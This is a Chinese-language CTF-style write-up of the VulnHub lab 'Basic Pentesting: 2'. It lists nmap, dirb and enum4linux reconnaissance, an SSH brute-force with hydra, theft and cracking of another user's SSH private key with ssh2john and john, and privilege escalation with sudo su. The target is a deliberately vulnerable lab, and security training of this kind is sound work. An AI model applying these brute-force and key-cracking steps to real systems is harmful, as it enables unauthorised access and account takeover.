Basic Pentesting:2-打靶渗透【附代码】(权限提升)

靶机下载地址:

https://www.vulnhub.com/entry/basic-pentesting-2,241/icon-default.png?t=N7T8https://www.vulnhub.com/entry/basic-pentesting-2,241/

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:1D:4A:27'

1.2. 端口扫描

nmap -p- 192.168.7.88

1.3. 目录扫描

dirb http://192.168.7.88

1.4. 敏感信息收集

whatweb http://192.168.7.88

2. WEB打点寻找漏洞点

2.1. 进入80端口

无有用信息

2.2. 拼接扫描到的目录

拼接/development

存在两个文件,逐个点开看看

dev.txt:

j.txt:

信息总结:
提了SMB版本以及配置完成的信息 -》正好开放了445端口,等等可以试试看
K用户回复J用户 -》
1.说他一直在审核 /etc/shadow 的内容
2.K说J存在着弱密码问题

2.3. 445端口

利用kali的enum4linux工具枚举SMB服务中的信息;

enum4linux -a -o 192.168.7.88 

成功的排列出两个用户名信息,也符合上述中交流的J和K;

kay
jan

2.4. Getshell

我们已知账户名,而且又知道J用户存在弱密码问题,那就利用kali的九头蛇爆破试试咯

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://192.168.7.88 -t 64 
# 得知密码为
# armando

3. 权限提升

3.1. 连接ssh

1.连接ssh

ssh jan@192.168.7.88

2.老规矩,查看是否存在特权命令,或是否存在具有root\all权限的可利用的可执行文件,没有利用点

suod -l

3.逐个查看可疑的文件 -> /home/kay/目录存在pass.bak文件,但无访问权限;

但是可以访问kay用户的ssh私钥文件

cd .ssh
ls -al
cat id_rsa

3.复制私钥至本地,赋予执行权限【注意格式问题】

chmod +x 1.txt

4.通过python转换id_rsa为可以识别的信息,然后利用字典解密该信息,来获取文件密码。

python /usr/share/john/ssh2john.py 1 > ssh_login
john --wordlist=/usr/share/wordlists/rockyou.txt ssh_login

获得密钥:beeswax

5.尝试登录ssh -> 成功

ssh -i 1 kay@192.168.7.88

3.2. 尝试提权

1.老规矩,查看是否存在特权命令,密码不大行,看看文件吧

sudo -l

2.有一个pass.bak文件,查看一下

cat pass.bak
# 有一段代码
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

这个可能是kay用户的密码,尝试使用命令sudo -l输入密码成功 -> 权限是all,直接提权 ->成功

sudo su

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

橙则Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值